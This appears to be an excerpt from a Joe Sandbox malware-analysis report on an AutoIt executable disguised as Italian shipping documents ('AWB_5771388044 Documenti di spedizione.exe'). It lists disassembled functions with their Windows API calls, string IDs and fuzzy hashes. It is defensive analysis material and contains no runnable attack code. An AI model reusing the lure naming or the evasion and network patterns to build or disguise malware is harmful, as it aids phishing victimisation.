                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                        • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                        • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                        • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                        Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                        • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                        • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                        • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                        Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 00476CB0
                        • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                        • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                        • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                        • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                        Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: htonsinet_addr
                        • String ID: 255.255.255.255
                        • API String ID: 3832099526-2422070025
                        • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                        • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                        • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                        • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                        Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: <local>
                        • API String ID: 2038078732-4266983199
                        • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                        • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                        • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                        • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                        Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __fread_nolock_memmove
                        • String ID: EA06
                        • API String ID: 1988441806-3962188686
                        • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                        • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                        • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                        • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                        Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: u,D
                        • API String ID: 4104443479-3858472334
                        • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                        • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                        • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                        • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                        Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • wsprintfW.USER32 ref: 0045612A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend_mallocwsprintf
                        • String ID: %d/%02d/%02d
                        • API String ID: 1262938277-328681919
                        • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                        • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                        • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                        • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                        Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetCloseHandle.WININET(?), ref: 00442663
                        • InternetCloseHandle.WININET ref: 00442668
                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CloseHandleInternet$ObjectSingleWait
                        • String ID: aeB
                        • API String ID: 857135153-906807131
                        • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                        • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                        • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                        • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                        Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • ^B, xrefs: 00433248
                        • C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, xrefs: 0043324B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcsncpy
                        • String ID: ^B$C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                        • API String ID: 1735881322-2708761414
                        • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                        • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                        • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                        • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                        Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                        Download Yara Rule
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                        • PostMessageW.USER32(00000000), ref: 00441C05
                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                        • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                        • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                        • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                        Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                        Download Yara Rule
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                        Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                        Download Yara Rule
                        APIs
                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Message_doexit
                        • String ID: AutoIt$Error allocating memory.
                        • API String ID: 1993061046-4017498283
                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D